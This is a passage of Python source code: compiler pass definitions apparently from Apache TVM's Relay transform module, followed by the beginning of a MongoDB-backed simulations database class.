It is recommended to call backward_fold_scale_axis
before using forward_fold_scale_axis, as backward folding targets the
common conv->bn pattern.
"""
return _ffi_api.ForwardFoldScaleAxis()
def SimplifyInference():
"""Simplify the data-flow graph for inference phase. An simplified expression
which is semantically equal to the input expression will be returned.
Note that batch norms will only be simplified if their result is indexed at
tuple index 0.
Returns
-------
ret: tvm.transform.Pass
The registered pass to perform operator simplification.
"""
return _ffi_api.SimplifyInference()
def FastMath():
"""Converts the expensive non linear functions to their fast but approximate counterparts.
Returns
-------
ret: tvm.transform.Pass
The registered pass to perform fast math operations.
"""
return _ffi_api.FastMath()
def CanonicalizeOps():
"""Canonicalize special operators to basic operators.
    This can simplify subsequent analysis, e.g. expanding bias_add to
expand_dims and broadcast_add.
Returns
-------
ret: tvm.transform.Pass
The registered pass performing the canonicalization.
"""
return _ffi_api.CanonicalizeOps()
def DeadCodeElimination(inline_once=False, ignore_impurity=False):
"""Remove expressions that do not have any users (dead code).
Parameters
----------
inline_once: Optional[Bool]
Whether to inline a binding that is referenced exactly once.
ignore_impurity: Optional[Bool]
Whether to ignore possible side-effects in let-bound expressions.
Returns
-------
ret: tvm.transform.Pass
The registered pass that eliminates the dead code in a Relay program.
"""
return _ffi_api.DeadCodeElimination(inline_once, ignore_impurity)
def LazyGradientInit():
"""Reduces memory usage of gradient tensors
Parameters
----------
Returns
-------
ret: tvm.transform.Pass
A pass which delays and/or reduces memory allocation,
by lazily allocating 0 or one filled tensors.
"""
return _ffi_api.LazyGradientInit()
def FoldConstantExpr(expr, mod):
"""Fold the constant expressions in a Relay program.
Parameters
----------
expr: Expr
The expression to fold
mod: IRModule
The module the expr lives in (for global calls)
Returns
-------
new_expr: Expr
The expr after Constant Folding
"""
return _ffi_api.FoldConstantExpr(expr, mod)
def FoldConstant():
"""Fold the constant expressions in a Relay program.
Returns
-------
ret : tvm.transform.Pass
The registered pass for constant folding.
"""
return _ffi_api.FoldConstant()
def FuseOps(fuse_opt_level=-1):
"""Fuse operators in an expr to a larger operator according to some rules.
Parameters
----------
fuse_opt_level : int
The level of fuse optimization. -1 indicates that the level will be
inferred from pass context.
Returns
-------
ret : tvm.transform.Pass
The registered pass for operator fusion.
"""
return _ffi_api.FuseOps(fuse_opt_level)
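# Illustrative sketch (not part of the original API): with fuse_opt_level=-1,
# FuseOps is driven by the opt_level of the enclosing PassContext; InferType is
# run first so fusion sees typed expressions. The helper name is hypothetical.
def _example_fuse_ops(mod):
    """Fuse operators in `mod` using the context's optimization level (illustrative only)."""
    with tvm.transform.PassContext(opt_level=3):
        return FuseOps(fuse_opt_level=-1)(InferType()(mod))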
def DefuseOps():
"""The inverse operation of FuseOps. It transforms a fused program returned by FuseOps into the
program before FuseOps. (i.e., x == DefuseOps(FuseOps(x)))
Returns
-------
ret : tvm.transform.Pass
The registered pass for operator defusion.
"""
return _ffi_api.DefuseOps()
def CombineParallelConv2D(min_num_branches=3):
"""Combine multiple conv2d operators into one.
Parameters
----------
min_num_branches : int
The minimum number of required parallel branches for performing this
optimization.
Returns
-------
ret: tvm.transform.Pass
The registered pass that combines parallel conv2d operators.
"""
return _ffi_api.CombineParallelConv2D(min_num_branches)
def CombineParallelDense(min_num_branches=3, to_batch=True):
"""Combine multiple dense operators into one. For example:
    .. code-block:: text
data
/ \
dense (2,2) dense (2,2)
| |
elemwise/bcast (2,2) elemwise/bcast (2,2)
Would become:
    .. code-block:: text
data
|
batch_matmul+elemwise/bcast (2,2,2)
or (if to_batch=False)
    .. code-block:: text
data
|
dense+elemwise/bcast (2,2+2)
Parameters
----------
min_num_branches : int
The minimum number of required parallel branches for performing this
optimization.
    to_batch : bool
If True, combine parallel dense ops into batch_matmul op.
If False, combine parallel dense ops into dense op.
Returns
-------
ret: tvm.transform.Pass
The registered pass that combines parallel dense operators.
"""
return _ffi_api.CombineParallelDense(min_num_branches, to_batch)
def CombineParallelBatchMatmul(min_num_branches=3):
"""Combine multiple batch matmul operators into one. For example:
    .. code-block:: text
data (1, 2, 3)
/ \
batch_matmul(data, (1, 4, 3)) batch_matmul(data, (1, 5, 3))
| |
elemwise/bcast (1, 2, 4) elemwise/bcast (1, 2, 5)
Would become:
    .. code-block:: text
data (1, 2, 3)
|
batch_matmul(data, (1, 4+5, 3))
|
        elemwise/bcast (1, 2, 4+5)
Parameters
----------
min_num_branches : int
The minimum number of required parallel branches for performing this
optimization.
Returns
-------
ret: tvm.transform.Pass
        The registered pass that combines parallel batch_matmul operators.
"""
return _ffi_api.CombineParallelBatchMatmul(min_num_branches)
def BatchingOps():
"""Batching parallel operators into one for Conv2D, Dense and BatchMatmul.
Returns
-------
ret: tvm.transform.Pass
        The sequential pass which applies batching for different operator types.
"""
return tvm.transform.Sequential(
[CombineParallelConv2D(), CombineParallelDense(), CombineParallelBatchMatmul()]
)
def AlterOpLayout():
"""Alternate the layouts of operators or replace primitive operators with
other expressions.
This pass can be used for computing convolution in custom layouts or
other general weight pre-transformation.
Returns
-------
ret : tvm.transform.Pass
The registered pass that alters the layout of operators.
"""
return _ffi_api.AlterOpLayout()
class LayoutConfig(object):
"""A structure for customizing the ConvertLayout pass."""
current = None
def __init__(self, skip_layers=None):
self.skip_counter = 0
self.skip_layers = skip_layers if skip_layers is not None else []
def check_skip(self):
skip = self.skip_counter in self.skip_layers
self.skip_counter += 1
return skip
def reset(self):
self.skip_counter = 0
self.skip_layers = []
def __enter__(self):
self._old_manager = LayoutConfig.current
LayoutConfig.current = self
return self
def __exit__(self, ptype, value, trace):
LayoutConfig.current = self._old_manager
def ConvertLayout(desired_layouts):
"""Given a dest layout, this pass transforms the expr such that most of the ops input data
layout is changed to the dest layout. In ideal situation, there are only 2 layout transforms,
one at the start and one at the end.
This pass is not a part of relay.build and is expected to be called between framework-relay
    parser and relay.build call. This is very helpful for hardware backends that support/prefer only
    one type of data layout.
RFC - https://discuss.tvm.apache.org/t/layout-conversion-pass/4009
This pass uses most of the AlterOpLayout and InferCorrectLayout infrastructure. We can define
new layouts for conv2d ops for now. Most of the other operators try to adapt to their input
layout using the InferCorrectLayout infrastructure.
Parameters
----------
desired_layouts : map of op_name to list of layouts
Specify a mapping of operator names to a list of layouts to convert to, in the order
        defined by the operator. An example for nn.conv2d could be: {"nn.conv2d": ["NHWC", "OHWI"]},
where the first item in the list specifies the data layout and the second specifies the
kernel layout.
Returns
-------
pass: FunctionPass
The pass.
"""
return _ffi_api.ConvertLayout(desired_layouts)
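# Illustrative sketch (not part of the original API): converting a module to
# NHWC data layout before relay.build. The layout strings are example values;
# the kernel layout must match what the target operators expect. The helper
# name is hypothetical.
def _example_convert_layout(mod):
    """Run ConvertLayout for nn.conv2d ops in `mod` (illustrative only)."""
    desired_layouts = {"nn.conv2d": ["NHWC", "HWIO"]}
    seq = tvm.transform.Sequential(
        [RemoveUnusedFunctions(), ConvertLayout(desired_layouts), FoldConstant()]
    )
    with tvm.transform.PassContext(opt_level=3):
        return seq(mod)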
def Legalize(legalize_map_attr_name="FTVMLegalize"):
"""Legalizes an expression with another expression.
This pass can be used to replace an expr with another expr for target
    dependent optimizations. For example, one expr, though semantically
equivalent to the other, can have better performance on a target. This pass
can be used to legalize the expr in a target-dependent manner.
Parameters
----------
legalize_map_attr_name : str
The Op's attr name which corresponds to the legalize rule function.
Returns
-------
ret : tvm.transform.Pass
The registered pass that rewrites an expr.
"""
return _ffi_api.Legalize(legalize_map_attr_name)
def MergeComposite(pattern_table):
"""Merge multiple operators into a single composite relay function.
Parameters
----------
pattern_table : List[Tuple[str, tvm.relay.dataflow_pattern.DFPattern, Function]]
A list of (pattern_name, pattern, check) tuples.
The order of the patterns in the list will determine the order
of priority in which they are matched.
'check' is a function to check whether an extracted pattern matches.
It can be implemented by pattern writer but if not specified it will
always return True.
Returns
-------
ret : tvm.transform.Pass
The registered pass that merges operators into a single composite
relay function.
"""
pattern_names = []
patterns = []
checks = []
for tup in pattern_table:
if len(tup) == 2:
pattern_name, pattern = tup
check = lambda extract: True
elif len(tup) == 3:
pattern_name, pattern, check = tup
pattern_names.append(pattern_name)
patterns.append(pattern)
checks.append(check)
return _ffi_api.MergeComposite(pattern_names, patterns, *checks)
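# Illustrative sketch (not part of the original API): building a small pattern
# table for MergeComposite. The pattern name "conv2d_relu" is arbitrary; the
# dataflow-pattern helpers come from tvm.relay.dataflow_pattern. The helper
# name is hypothetical.
def _example_merge_composite(mod):
    """Wrap conv2d followed by relu into composite functions (illustrative only)."""
    from tvm.relay.dataflow_pattern import is_op, wildcard
    conv = is_op("nn.conv2d")(wildcard(), wildcard())
    pattern = is_op("nn.relu")(conv)
    # 2-tuples omit the check function, which then defaults to "always True"
    return MergeComposite([("conv2d_relu", pattern)])(mod)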
def MergeCompilerRegions():
"""Merge together compiler regions.
Returns
-------
ret : tvm.transform.Pass
The registered pass that merges compiler regions.
"""
return _ffi_api.MergeCompilerRegions()
def ToANormalForm():
"""Turn Graph Normal Form expression into A Normal Form Expression.
The scope of the root expression is the global scope.
    The scope of any non-root expression is the least common ancestor of all its scopes.
Values are ordered by post-DFS order in each scope.
Returns
-------
ret : Union[tvm.transform.Pass, tvm.relay.Expr]
The registered pass that transforms an expression into A Normal Form.
"""
return _ffi_api.ToANormalForm()
def ToANormalFormExpr(e):
"""ToANormalForm, but on expression level.
Parameters
----------
e : Expr
The graph expression.
Returns
-------
ret : Expr
        The transformed expression.
"""
return _ffi_api.ToANormalFormExpr(e)
def ToBasicBlockNormalForm():
"""Turn an expression to Basic Block Normal Form.
We define a block as a group of expressions implied by the scope structure.
Each graph node can only belong to a single block.
For any value that is being used in multiple blocks, it has to be referred
by a Var which is defined in a block, whose scope is the least common ancestor
of blocks this value is used.
Returns
-------
ret: tvm.transform.Pass
The registered pass that transforms an expression into Basic Block Normal Form.
"""
return _ffi_api.ToBasicBlockNormalForm()
def ToCPS(expr, mod=None):
"""
    Turn expression into continuation passing style (CPS).
Every intermediate compute will be passed to a continuation.
Returns
-------
result: tvm.transform.Pass
The registered pass that transforms an expression into CPS.
"""
return _ffi_api.to_cps(expr, mod)
def EtaExpand(expand_constructor=False, expand_global_var=False):
"""Add abstraction over a constructor or global variable bound to a function
Parameters
----------
expand_constructor: bool
Whether to expand constructors.
expand_global_var: bool
Whether to expand global variables.
Returns
-------
ret: tvm.transform.Pass
The registered pass that eta expands an expression.
"""
return _ffi_api.EtaExpand(expand_constructor, expand_global_var)
def ToGraphNormalForm():
"""Turn a Relay program in A Normal Form into Graph Normal Form
Returns
-------
ret : tvm.transform.Pass
The registered pass that transforms an expression into Graph Normal Form.
"""
return _ffi_api.ToGraphNormalForm()
def EliminateCommonSubexpr(fskip=None):
"""Eliminate common subexpressions.
Parameters
----------
fskip: Callable
The callback function that decides whether an expression should be
skipped.
Returns
-------
ret : tvm.transform.Pass
The registered pass that eliminates common subexpressions.
"""
return _ffi_api.EliminateCommonSubexpr(fskip)
def PartialEvaluate():
"""Evaluate the static fragment of the code.
Note
----
This transformation could be either `Module -> Module` or `Expr -> Expr`.
It will directly transform the input expression to a new one if the target
expression is provided. Otherwise, it will rely on the pass manager to
carry out transformation.
Returns
-------
ret: tvm.transform.Pass
The registered pass that performs partial evaluation on an expression.
"""
return _ffi_api.PartialEvaluate()
def CanonicalizeCast():
"""
Canonicalize cast expressions to make operator fusion more efficient.
Returns
-------
ret : tvm.transform.Pass
The registered pass that canonicalizes cast expression.
"""
return _ffi_api.CanonicalizeCast()
def LambdaLift():
"""
Lift the closure to global function.
Returns
-------
ret : tvm.transform.Pass
The registered pass that lifts the lambda function.
"""
return _ffi_api.LambdaLift()
def PartitionGraph(mod_name="default", bind_constants=True):
"""Partition a Relay program into regions that can be executed on different
backends.
Parameters
----------
mod_name : string
        Controls the prefix of the name of each partitioned subgraph.
If `mod_name` is None, then `tvmgen_` prefix is used.
Otherwise, `tvmgen_mod_name_` prefix is used.
bind_constants: bool
Whether or not to bind constants in partitioned subgraphs. Note that the codegen needs
to maintain the bound constants; Otherwise the constants will be maintained by
the metadata module. So it is recommended for C-source based codegens to
set bind_constants=False to avoid embedding large constants in a C source file.
Returns
-------
ret: tvm.transform.Pass
The registered pass that partitions the Relay program.
"""
mod_name = mangle_module_name(mod_name)
return _ffi_api.PartitionGraph(mod_name, bind_constants)
def AnnotateTarget(targets, include_non_call_ops=True):
"""Annotate ops in an experession with a provied compiler/target and then
use it for codegen.
Parameters
----------
targets : str or List[str]
The list of target compilers used for codegen.
include_non_call_ops : boolean
If True then non-call ops also will be annotated with targets
If False then non-call ops will not be processed
Returns
-------
ret : tvm.transform.Pass
        The annotated pass that wraps ops with subgraph_start and
subgraph_end.
"""
if isinstance(targets, str):
targets = [targets]
return _ffi_api.AnnotateTarget(
[tvm.runtime.container.String(t) for t in targets], include_non_call_ops
)
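# Illustrative sketch (not part of the original API): the usual bring-your-own-
# codegen flow chains AnnotateTarget, MergeCompilerRegions and PartitionGraph.
# The compiler name "dnnl" is only an example and must match a registered
# external codegen; the helper name is hypothetical.
def _example_offload_to_external_codegen(mod, compiler="dnnl"):
    """Partition supported regions of `mod` for an external codegen (illustrative only)."""
    seq = tvm.transform.Sequential(
        [AnnotateTarget(compiler), MergeCompilerRegions(), PartitionGraph()]
    )
    return seq(mod)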
def DynamicToStatic():
"""If possible, convert tvm.relay.dynamic* ops to static versions
Returns
-------
ret : tvm.transform.Pass
The registered pass for dynamic->static conversion.
"""
return _ffi_api.DynamicToStatic()
def Inline():
"""Perform inlining on the given Relay IR module. The global functions that
    are marked as `inline` should always be inlined. A cost model will be
needed in the future to decide if it is profitable to inline the function.
Returns
-------
ret: tvm.transform.Pass
The registered pass that performs inlining for a Relay IR module.
"""
return _ffi_api.Inline()
def gradient(expr, mod=None, mode="higher_order"):
"""
Transform the input function,
    returning a function that calculates the original result,
    paired with the gradient of the input.
Parameters
----------
expr : tvm.relay.Expr
The input expression, which is a Function or a GlobalVar.
mod : Optional[tvm.IRModule]
mode : Optional[String]
The mode of the automatic differentiation algorithm.
'first_order' only works on first order code, but will not produce
reference nor closure.
'higher_order' works on all code using reference and closure.
Returns
-------
expr : tvm.relay.Expr
The transformed expression.
"""
if mode == "first_order":
warnings.warn(
"using transform.gradient for first-order AD is deprecated, please use the"
"FirstOrderGradient module pass",
DeprecationWarning,
)
if mod is not None:
raise RuntimeError(
"to run first-order AD on a module, please use the FirstOrderGradient module pass."
)
return FirstOrderGradient()(tvm.IRModule.from_expr(expr))["main"]
if mode == "higher_order":
return _ffi_api.gradient(expr, mod)
raise Exception("unknown mode")
def FirstOrderGradient():
"""
Transforms all global functions in the module to return the original result, paired with the
gradients of the inputs. This pass transforms each global function independently and does not
support interprocedural AD. Additionally, this pass does not support any control-flow or
references, and should only be used on pure data-flow graphs.
Returns
-------
ret : tvm.transform.Pass
The registered FirstOrderGradient pass.
"""
return _ffi_api.FirstOrderGradient()
def Defunctionalization(func, mod):
"""
Performs defunctionalization on func,
transforming func from a higher-order program to a first-order program.
At each call site, the function is cloned and type parameters are substituted in.
Function arguments are encoded as datatypes
and additional apply functions are used for application.
Parameters
----------
func : tvm.relay.Function
The input function, which should not be polymorphic or be higher-order.
This is because all types must be known and we can't encode function arguments
to the program itself.
mod : tvm.IRModule
The IRModule containing function and type definitions,
which is also mutated during this pass.
Returns
-------
expr : tvm.relay.Function
The output function.
"""
return _ffi_api.Defunctionalization(func, mod)
def to_cps(func, mod=None):
"""
Turn expression into CPS expression.
Every intermediate compute will be passed to a continuation.
Parameters
----------
func: tvm.relay.Function
The input function.
mod: Optional[tvm.IRModule]
The global module.
Returns
-------
result: tvm.relay.Function
The output function.
"""
use_mod = mod if mod is not None else tvm.ir.IRModule()
return _ffi_api.to_cps(func, use_mod)
def un_cps(func):
"""
    Turn a CPS function into a Function without the continuation argument.
Note that this will not give the exact same interface as before cps:
If the input/output is higher order, they will still be in cps form.
Parameters
----------
func: tvm.relay.Function
The input function
Returns
-------
result: tvm.relay.Function
The output function
"""
return _ffi_api.un_cps(func)
def _wrap_class_function_pass(pass_cls, pass_info):
"""Wrap a python class as function pass"""
class PyFunctionPass(FunctionPass):
"""Internal wrapper class to create a class instance."""
def __init__(self, *args, **kwargs):
            # initialize handle in case pass_cls creation fails
self.handle = None
inst = pass_cls(*args, **kwargs)
# it is important not to capture self to
# avoid a cyclic dependency
def _pass_func(func, mod, ctx):
return inst.transform_function(func, mod, ctx)
self.__init_handle_by_constructor__(_ffi_api.MakeFunctionPass, _pass_func, pass_info)
self._inst = inst
def __getattr__(self, name):
# fall back to instance attribute if there is not any
return self._inst.__getattribute__(name)
functools.update_wrapper(PyFunctionPass.__init__, pass_cls.__init__)
PyFunctionPass.__name__ = pass_cls.__name__
PyFunctionPass.__doc__ = pass_cls.__doc__
PyFunctionPass.__module__ = pass_cls.__module__
return PyFunctionPass
def function_pass(pass_func=None, opt_level=None, name=None, required=None):
"""Decorate a function pass.
This function returns a callback when pass_func
is provided. Otherwise, it returns the created function pass using the
given optimization function.
Parameters
----------
pass_func : Optional[Callable[(Function, Module, PassContext) -> Function]]
The transformation function or class.
opt_level : int
The optimization level of this module pass.
name : Optional[str]
The name of the function pass. The name could be empty. In this case, the
name of the optimization function will be used as the pass name.
required : Optional[List[str]]
The list of passes that the module pass is dependent on.
Returns
-------
create_function_pass : Union[Callable, FunctionPass]
A decorator will be returned if pass_func is not provided,
otherwise return the decorated result.
The returned decorator has two behaviors depending on the input:
A new FunctionPass will be returned when we decorate a pass function.
A new FunctionPass class will be returned when we decorate a class type.
Examples
--------
The following code block decorates a function pass class.
.. code-block:: python
@relay.transform.function_pass(opt_level=1)
class TestReplaceFunc:
def __init__(self, new_func):
self.new_func = new_func
def transform_function(self, func, mod, ctx):
# just for demo purposes
# transform func to new_func
return self.new_func
x = relay.var("x", shape=(10, 20))
f1 = relay.Function([x], x)
f2 = relay.Function([x], relay.log(x))
# fpass is now a special pass that replaces every
# function to f1
fpass = TestReplaceFunc(f1)
# now every function in input_mod is replaced by f1
res_mod = fpass(input_mod)
The following code creates a function pass by decorating
a user defined transform function.
.. code-block:: python
@relay.transform.function_pass(opt_level=2)
def transform(func, mod, ctx):
# my transformations here.
return func
function_pass = transform
assert isinstance(function_pass, transform.FunctionPass)
assert function_pass.info.opt_level == 2
        # Given a module m, the optimization could be invoked as the following:
updated_mod = function_pass(m)
        # Now the transform should have been applied to every function in
        # the provided module m, and the updated module will be returned.
"""
if opt_level is None:
raise ValueError("Please provide opt_level for the function pass.")
required = required if required else []
if not isinstance(required, (list, tuple)):
raise TypeError("Required is expected to be the type of " + "list/tuple.")
def create_function_pass(pass_arg):
"""Internal function that creates a function pass"""
fname = name if name else pass_arg.__name__
info = tvm.transform.PassInfo(opt_level, fname, required)
if inspect.isclass(pass_arg):
return _wrap_class_function_pass(pass_arg, info)
if not isinstance(pass_arg, (types.FunctionType, types.LambdaType)):
raise TypeError("pass_func must be a callable for Module pass")
return _ffi_api.MakeFunctionPass(pass_arg, info)
if pass_func:
return create_function_pass(pass_func)
return create_function_pass
@function_pass(opt_level=1)
class ChangeBatch:
"""
Change the batch size.
Parameters
----------
data: Dict[relay.Var, int]
A dictionary of all the params to change.
The keys are all params, and the values are which dimension hold the batch.
batch_size: int
The batch size to change to.
Returns
-------
pass: FunctionPass
The pass.
"""
def __init__(self, data, batch_size=16):
self.data = data
self.batch_size = batch_size
def transform_function(self, func, mod, ctx):
func = relay.Function(func.params, func.body, None, func.type_params, func.attrs)
change_batch = self
class ChangeBatchMutator(tvm.relay.ExprMutator):
def visit_var(self, var):
if var in change_batch.data:
ty = var.type_annotation
new_shape = list(ty.shape)
new_shape[change_batch.data[var]] = change_batch.batch_size
return relay.Var(var.name_hint, relay.TensorType(new_shape, ty.dtype))
return var
return ChangeBatchMutator().visit(func)
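# Illustrative sketch (not part of the original API): ChangeBatch is itself a
# FunctionPass, so it can be applied to a module directly. We assume the first
# parameter of "main" carries the batch in dimension 0; the helper name is
# hypothetical.
def _example_change_batch(mod):
    """Rewrite the batch dimension of the first "main" parameter to 8 (illustrative only)."""
    data = mod["main"].params[0]
    return ChangeBatch({data: 0}, batch_size=8)(mod)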
def DenseToSparse(weight_name, weight_shape):
"""
Rewrite qualified ```nn.dense operation``` to ```nn.sparse_dense```
This pass is used in ```data_dep_optimization.bsr_dense```
Parameters of this pass is generated by ```analysis.sparse_dense.process_params```
Parameters
----------
weight_name: Array[String]
        Names of weights which qualify for the sparse constraints
weight_shape: Array[Array[IntImm]]
Weights shape in BSR format.
Returns
-------
ret : tvm.transform.Pass
The registered DenseToSparse pass.
"""
return _ffi_api.DenseToSparse(weight_name, weight_shape)
def Conv2dToSparse(weight_name, weight_shape, layout, kernel_size):
"""
Rewrite qualified ```nn.conv2d operation``` to ```nn.sparse_conv2d```
Parameters
----------
weight_name: Array[String]
        Names of weights which qualify for the sparse constraints
weight_shape: Array[Array[IntImm]]
Weights shape in BSR format.
layout : str
layout of data
Returns
-------
ret : tvm.transform.Pass
        The registered Conv2dToSparse pass.
"""
return _ffi_api.Conv2dToSparse(weight_name, weight_shape, layout, kernel_size)
def Conv2dToSparse2(layout, kernel_size, blocksize, sparsity_threshold):
"""
    Rewrite frozen ```nn.conv2d``` operations to ```nn.sparse_conv2d```
Parameters
----------
layout : str
layout of data
kernel_size : int
kernel size of conv2d
Returns
-------
ret : tvm.transform.Pass
        The registered Conv2dToSparse2 pass.
"""
return _ffi_api.Conv2dToSparse2(layout, kernel_size, *blocksize, sparsity_threshold)
def SimplifyFCTranspose(target_weight_name):
"""
Rewrite ```y = nn.dense(x, transpose(w, [1, 0]))``` to ```y = nn.dense(x, wt)```
This pass is used in ```data_dep_optimization.simplify_fc_transpose```
Parameters
----------
weight_name: Array[String]
Names of weights which qualified ```y = nn.dense(x, transpose(w, [1, 0]))```
This parameter is generated by ```analysis.search_fc_transpose``` function
Returns
-------
ret : tvm.transform.Pass
The registered SimplifyFCTranspose pass.
"""
return _ffi_api.SimplifyFCTranspose(target_weight_name)
def SimplifyExpr():
"""
Simplify the Relay expression, including merging consecutive reshapes.
Returns
-------
ret : tvm.transform.Pass
The registered SimplifyExpr pass.
"""
return _ffi_api.SimplifyExpr()
def PlanDevices(config):
"""
Uses existing "on_device" and "device_copy" calls to infer the virtual device on which
every Relay sub-expression should run and the result stored. Captures the result of that
analysis using new "on_device" and "device_copy" calls. Sub-expressions which are
    not otherwise constrained are assigned to the default primitive virtual device described by
    config. However, data and computations which must be hosted on a CPU (such as shapes and
shape functions) use the host virtual device of the config.
Parameters
----------
config : tvm.CompilationConfig
The compilation configuration, specifying available targets and default devices.
Returns
-------
ret : tvm.transforms.Pass
The pass.
"""
return _ffi_api.PlanDevices(config)
def FoldExplicitPadding():
"""
    FoldExplicitPadding finds explicit padding before an op that can support
implicit padding and fuses them.
Returns
-------
ret : tvm.transform.Pass
The registered ImplicitPadding pass.
"""
return _ffi_api.FoldExplicitPadding()
def AnnotateSpans():
"""
Annotate a program with span information by first generating its textual
representation and then parsing it back into a Relay AST annotated with
span information.
Returns
-------
ret : tvm.transform.Pass
The registered AnnotateSpans pass.
"""
return _ffi_api.AnnotateSpans()
def FakeQuantizationToInteger(hard_fail=False):
# pylint: disable=anomalous-backslash-in-string
"""
Find regions of the graph of the form
.. code-block:: text
x w
| |
dq dq
\\ /
op1
|
op2
|
q
where ``q == qnn.quantize`` and ``dq = qnn.dequantize``
and rewrite them into integer versions of ``op1`` and ``op2``
    Rules for rewriting individual ops are in fake_quantization_to_integer.py
Parameters
----------
hard_fail : boolean
        How to deal with errors during graph rewriting.
If true, raise an error.
If false, skip rewriting the subgraph.
Returns
-------
ret : tvm.transform.Pass
        The registered FakeQuantizationToInteger pass.
"""
return _ffi_api.FakeQuantizationToInteger(hard_fail)
def ToMixedPrecision(mixed_precision_type="float16", missing_op_mode=1):
"""
Automatic mixed precision rewriter. Rewrite an FP32 relay graph into a version
where as many operations as possible are in the target mixed_precision_type.
Parameters
----------
mixed_precision_type: str
The target datatype to transform operations in the graph to use.
missing_op_mode: int
Determines how to handle ops not registered with FTVMMixedPrecisionConversionType
0: Does not allow any missing ops. Will throw errors when encountering any.
1: Allow missing ops but emit warnings.
2: Allow missing ops and silently ignore them.
Returns
-------
ret : tvm.transform.Pass
The registered pass.
"""
if missing_op_mode < 0 or missing_op_mode > 2:
raise ValueError("Missing op mode is either 0, 1, or 2")
return _ffi_api.ToMixedPrecision(mixed_precision_type, missing_op_mode)
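# Illustrative sketch (not part of the original API): a typical mixed-precision
# conversion, running InferType first and folding constants afterwards to clean
# up the inserted casts. The helper name is hypothetical.
def _example_to_mixed_precision(mod):
    """Convert `mod` to float16 where supported, warning on unregistered ops (illustrative only)."""
    seq = tvm.transform.Sequential(
        [InferType(), ToMixedPrecision("float16", missing_op_mode=1), FoldConstant()]
    )
    with tvm.transform.PassContext(opt_level=3):
        return seq(mod)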
def SplitArgs(max_function_args):
"""Split function with huge number of arguments to smaller pieces.
Returns
-------
ret : tvm.transform.Pass
The registered pass for constant folding.
"""
return _ffi_api.SplitArgs(max_function_args)
# added by Archermmt 2021-01-10
def InferLayout():
"""Infer the layouts of tensors
Returns
-------
ret : tvm.transform.Pass
        The registered pass to infer layouts following the forward direction.
    Note
    ----
    Should work together with BackwardInferLayout.
"""
return _ffi_api.InferLayout()
|
# python 2+3 compatibility
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import super
import bson
import logging
import datetime
from ..common import try_reduce
from .. import units
from .simulationsdb import SimulationsDB
log = logging.getLogger(__name__)
class MongoSimsDB(SimulationsDB):
"""
    Define a (mostly) concrete implementation of a SimulationsDB with a
MongoDB backend. Users may want to use this class as a base or template for
adding their own features.
In this implementation, no assumptions are made about the structure of each
dataset. The class constructor takes several functions that are called
    to generate queries. Values requested for evaluation should be SimDocEval
objects which know how to parse and combine values.
"""
def __init__(self, collection, buildqueries, livetime, livetimepro=None,
summaryview=None,
**kwargs):
"""Create a new SimulationsDB interface to a mongodb backend.
Args:
collection : pymongo.Collection holding the simulation data. Any
                                necessary indices should already be applied
buildqueries (func): a function to generate database queries for
a SimDataRequest object. For each separate
query generated, the function should call
`request.addquery` with appropriate weight.
This function should also take into account
modifiers to the queries accessible from
`request.getquerymods`. A static function
                                 `MongoSimsDB.modquery` is provided to do a simple
`dict.update` for each mod.
livetime (func): a function to calculate the livetime for a
collection of datasets. Takes 2 arguments:
a SimDataMatch and a list of documents retrieved
from the database. Do not modify the match object!
livetimepro (dict): projection document when querying for livetime
summaryview (dict): mapping document to apply to each entry
when producing a summary table
"""
# initialize the DB connection
self.collection = collection
self.buildqueries = buildqueries
self.livetime = livetime
        self.livetimepro = livetimepro
        self.summaryview = summaryview
# initialize the base class
super().__init__(**kwargs)
########### required simulationsdb overrides ##############
def genqueries(self, match, findnewdata=True):
# call the callback to generate queries
matches = self.buildqueries(match)
# attach and interpret data
if findnewdata:
# make sure its iterable
if not matches:
matches = []
elif not isinstance(matches, (list, tuple, set)):
matches = [matches]
for match in matches:
hits = tuple(self.collection.find(match.query,
self.livetimepro))
dataset = list(str(d['_id']) for d in hits)
livetime = 0*units.year
if not dataset:
match.addstatus('nodata')
else:
try:
livetime = self.livetime(match, hits)
except ZeroDivisionError:
pass
match.dataset = dataset
match.livetime = livetime
return matches
def _eval_match(self, values, match):
""" Evaluate a set of database hits over all values """
result = [None for _ in values]
projection = {}
for value in values:
projection = value.project(projection)
dataset = match.dataset
if not dataset:
return result
if not isinstance(dataset, (list, tuple)):
dataset = (dataset,)
elif isinstance(dataset, list):
dataset = tuple(dataset)
for entry in dataset:
# ID should be an object ID, but don't raise a fuss if not
try:
entry = bson.ObjectId(entry)
except bson.errors.InvalidId:
pass
try:
doc = self.collection.find_one({'_id': entry}, projection)
except Exception as e:
log.error("Caught exception '%s' querying database with projection %s",e, projection)
doc = None
if not doc:
# Entry should have been for an existing document, so
# something went really wrong here...
raise KeyError("No document with ID %s in database" % entry)
for i, v in enumerate(values):
try:
result[i] = try_reduce(v.reduce, v.parse(doc), result[i])
except Exception as e:
log.warning("Exception parsing %s in dataset %s: %s",
v.label, doc.get('_id','<no id>'), e)
# now normalize everything
for i, v in enumerate(values):
if result[i] is None:
continue
try:
result[i] = v.norm(result[i], match)
except Exception as e:
log.warning("Caught exception normalizing match %s: %e",
match.id, e)
result[i] = 0
return result
def evaluate(self, values, matches):
"""Sum up each key in values, weighted by livetime.
If entries were all numbers, we could make this more efficient by
using the aggregation pipeline. But that won't work when trying to add
histograms, so we just read each value and do the sum ourselves.
Args:
values (list) : list of SimDocEval objects that specify the projection
and interpretation of each dataset
matches (list): list of SimDataMatch objects to calculate and reduce
each value over
"""
try:
lenresult = len(values)
except TypeError:
values = [values]
lenresult = 1
result = [0]*lenresult
matches = matches if isinstance(matches, (list, tuple)) else [matches]
for match in matches:
parsed = self._eval_match(values, match)
for i, v in enumerate(values):
result[i] = try_reduce(v.reduce, parsed[i], result[i])
return result
def getdatasetdetails(self, dataset):
# dataset should be an ID but may be stringified
try:
dataset = bson.ObjectId(dataset)
except bson.errors.InvalidId: # not an object ID
pass
return self.collection.find_one(dataset)
# if isinstance(dataset, str) and dataset.startswith('['):
# try:
# dataset = json.loads(dataset)
# except json.JSONDecodeError:
# log.error("Can't convert from string list %s",dataset)
# if not isinstance(dataset,(list, tuple)):
# dataset = [bson.ObjectId(dataset)]
# return list(self.collection.find({'_id':{'$in':dataset}}))
# return [self.collection.find_one({'_id':entry}) for entry in dataset]
@staticmethod
def modquery(query, request):
"""Utility function implementing a very basic query update process.
        For each requested modifier in the request, the query is updated directly
(using `dict.update`). This is mostly to serve as an example of how
        to implement a more useful interpreter.
"""
for mod in request.getquerymods():
if mod:
query.update(mod)
return query
def runquery(self, query, projection=None, sort=None):
pipeline = []
if query:
# allow for lazy querying
